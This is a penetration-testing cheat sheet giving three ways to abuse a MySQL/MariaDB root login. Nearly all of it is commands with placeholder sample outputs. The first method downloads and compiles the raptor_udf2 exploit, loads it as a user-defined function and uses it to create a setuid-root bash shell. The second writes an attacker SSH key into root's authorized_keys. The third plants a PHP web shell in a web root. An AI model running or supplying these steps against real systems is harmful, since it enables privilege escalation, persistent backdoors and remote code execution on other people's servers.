Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Abuse #1: User Defined Function (UDF)
# Get the raptor_udf2.c
wget https://www.exploit-db.com/raw/1518 -O raptor_udf2.c
Sample Output:
TO-DO# Compile the source script
gcc -g -c raptor_udf2.c
Sample Output:
TO-DOgcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
Sample Output:
TO-DO# Copy to target folder
cp raptor_udf2.so /dev/shm/raptor_udf2.so
Sample Output:
TO-DO# Connect to database as root
mysql -u root -p<PASSWORD> mysql
Sample Output:
TO-DO# UDF
create table foo(line blob);
Sample Output:
TO-DOinsert into foo values(load_file('/dev/shm/raptor_udf2.so'));
Sample Output:
TO-DO# Get plug-in directory
show variables like '%plugin%';
Sample Output:
TO-DO+-----------------+---------------------------------------------+
| Variable_name | Value |
+-----------------+---------------------------------------------+
| plugin_dir | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma |
+-----------------+---------------------------------------------+
Sample Output:
TO-DO# Copy the plugin_dir value
select * from foo into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so';
Sample Output:
TO-DOcreate function do_system returns integer soname 'raptor_udf2.so';
Sample Output:
TO-DO# RCE
select do_system('cp /bin/bash /tmp/shell; chmod 4777 /tmp/shell');
Sample Output:
TO-DOAbuse #2: Add ssh public key to root
# Connect to database as root
mysql -u root -p'<PASSWORD>' mysql
Sample Output:
TO-DO# Check privilege
select current_user();
Sample Output:
TO-DOshow grants for root@localhost;
Sample Output:
TO-DO# If mysql file write is not able to append or overwrite authorized_keys
select "BASE64_PUB_KEY" into outfile "/root/.ssh/authorized_keys2";
Sample Output:
TO-DOAbuse #3: Create php File from Database to RCE
create table test(stuff text);
Sample Output:
TO-DOinsert into test values('<?php system($_REQUEST["cmd"]); ?>');
Sample Output:
TO-DOselect * from test into dumpfile 'C:\\xampp\\htdocs\\cmd.php';
Sample Output:
TO-DO